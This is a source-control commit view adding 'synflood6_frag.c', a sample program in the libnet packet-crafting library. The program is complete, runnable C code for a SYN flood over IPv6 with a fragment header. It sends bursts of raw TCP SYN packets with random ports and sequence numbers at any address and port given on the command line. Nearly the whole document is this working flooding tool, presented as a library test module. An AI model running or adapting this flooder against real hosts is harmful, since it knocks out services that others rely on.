summaryrefslogtreecommitdiff
path: root/sample/synflood6_frag.c
diff options
context:
space:
mode:
Diffstat (limited to 'sample/synflood6_frag.c')
-rw-r--r--sample/synflood6_frag.c234
1 files changed, 234 insertions, 0 deletions
diff --git a/sample/synflood6_frag.c b/sample/synflood6_frag.c
new file mode 100644
index 0000000..3a09c9d
--- /dev/null
+++ b/sample/synflood6_frag.c
@@ -0,0 +1,234 @@
+/*
+ * $Id: synflood6_frag.c,v 1.1 2004/01/03 20:31:01 mike Exp $
+ *
+ * Poseidon++ (c) 1996 - 2003 Mike D. Schiffman <mike@infonexus.com>
+ * SYN flooder rewritten for no good reason. Again as libnet test module.
+ * Again for libnet 1.1.
+ * All rights reserved.
+ *
+ * Modifications for ipv6 by Stefan Schlott <stefan@ploing.de>
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "../include/config.h"
+#endif
+#include "./libnet_test.h"
+
+struct t_pack
+{
+ struct libnet_ipv6_hdr ip;
+ struct libnet_tcp_hdr tcp;
+};
+
+
+int
+main(int argc, char **argv)
+{
+ struct libnet_in6_addr dst_ip;
+ struct libnet_in6_addr src_ip;
+ u_short dst_prt = 0;
+ u_short src_prt = 0;
+ libnet_t *l;
+ libnet_ptag_t tcp, ip, ip_frag;
+ char *cp;
+ char errbuf[LIBNET_ERRBUF_SIZE];
+ int i, j, c, packet_amt, burst_int, burst_amt;
+ char srcname[100], dstname[100];
+ uint8_t payload[56];
+
+ packet_amt = 0;
+ burst_int = 0;
+ burst_amt = 1;
+ tcp = ip_frag = ip = LIBNET_PTAG_INITIALIZER;
+
+ printf("libnet 1.1 syn flooding: TCP IPv6 fragments [raw]\n");
+
+ l = libnet_init(
+ LIBNET_RAW6, /* injection type */
+ NULL, /* network interface */
+ errbuf); /* error buffer */
+
+ if (l == NULL)
+ {
+ fprintf(stderr, "libnet_init() failed: %s", errbuf);
+ exit(EXIT_FAILURE);
+ }
+
+ while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
+ {
+ switch (c)
+ {
+ case 't':
+ if (!(cp = strrchr(optarg, '/')))
+ {
+ usage(argv[0]);
+ exit(EXIT_FAILURE);
+ }
+ *cp++ = 0;
+ dst_prt = (u_short)atoi(cp);
+ dst_ip = libnet_name2addr6(l, optarg, LIBNET_RESOLVE);
+ if (strncmp((char*)&dst_ip,
+ (char*)&in6addr_error,sizeof(in6addr_error))==0)
+ {
+ fprintf(stderr, "Bad IPv6 address: %s\n", optarg);
+ exit(EXIT_FAILURE);
+ }
+ break;
+ case 'a':
+ packet_amt = atoi(optarg);
+ break;
+ case 'i':
+ burst_int = atoi(optarg);
+ break;
+ case 'b':
+ burst_amt = atoi(optarg);
+ break;
+ default:
+ usage(argv[0]);
+ exit(EXIT_FAILURE);
+ }
+ }
+
+ src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE);
+ /* src_ip = libnet_name2addr6(l,
+ "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE);
+ dst_prt = 113;
+ dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE);
+ packet_amt = 1;
+ */
+
+ if (!dst_prt || strncmp((char*)&dst_ip,
+ (char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
+ {
+ usage(argv[0]);
+ exit(EXIT_FAILURE);
+ }
+
+ libnet_seed_prand(l);
+ libnet_addr2name6_r(src_ip, LIBNET_RESOLVE, srcname, sizeof(srcname));
+ libnet_addr2name6_r(dst_ip, LIBNET_RESOLVE, dstname, sizeof(dstname));
+
+ for(; burst_amt--;)
+ {
+ for (i = 0; i < packet_amt; i++)
+ {
+ for (j = 0; j < 56; j++) payload[j] = 'A' + ((char)(j % 26));
+
+ tcp = libnet_build_tcp(
+ src_prt = libnet_get_prand(LIBNET_PRu16),
+ dst_prt,
+ libnet_get_prand(LIBNET_PRu32),
+ libnet_get_prand(LIBNET_PRu32),
+ TH_SYN,
+ libnet_get_prand(LIBNET_PRu16),
+ 0,
+ 0,
+ LIBNET_TCP_H,
+ NULL,
+ 0,
+ l,
+ tcp);
+ if (tcp == -1)
+ {
+ fprintf(stderr, "Can't build or modify TCP header: %s\n",
+ libnet_geterror(l));
+ return (EXIT_FAILURE);
+ }
+
+ ip_frag = libnet_build_ipv6_frag(
+ IPPROTO_TCP, /* next header */
+ 0, /* reserved */
+ 0, /* frag bits */
+ 1, /* ip id */
+ NULL,
+ 0,
+ l,
+ ip_frag);
+ if (ip_frag == -1)
+ {
+ fprintf(stderr, "Can't build or modify TCP header: %s\n",
+ libnet_geterror(l));
+ return (EXIT_FAILURE);
+ }
+
+ ip = libnet_build_ipv6(
+ 0, 0,
+ LIBNET_TCP_H,
+ IPPROTO_TCP,
+ 64,
+ src_ip,
+ dst_ip,
+ NULL,
+ 0,
+ l,
+ ip);
+ if (ip == -1)
+ {
+ fprintf(stderr, "Can't build or modify TCP header: %s\n",
+ libnet_geterror(l));
+ return (EXIT_FAILURE);
+ }
+
+ printf("%15s/%5d -> %15s/%5d\n",
+ srcname,
+ ntohs(src_prt),
+ dstname,
+ dst_prt);
+
+ c = libnet_write(l);
+ if (c == -1)
+ {
+ fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
+ }
+#if !(__WIN32__)
+ usleep(250);
+#else
+ Sleep(250);
+#endif
+
+ }
+#if !(__WIN32__)
+ sleep(burst_int);
+#else
+ Sleep(burst_int * 1000);
+#endif
+ }
+ exit(EXIT_SUCCESS);
+}
+
+
+void
+usage(char *nomenclature)
+{
+ fprintf(stderr,
+ "\n\nusage: %s -t -a [-i -b]\n"
+ "\t-t target, (ip6:address/port, e.g. ::1/23)\n"
+ "\t-a number of packets to send per burst\n"
+ "\t-i packet burst sending interval (defaults to 0)\n"
+ "\t-b number packet bursts to send (defaults to 1)\n" , nomenclature);
+}
+
+
+/* EOF */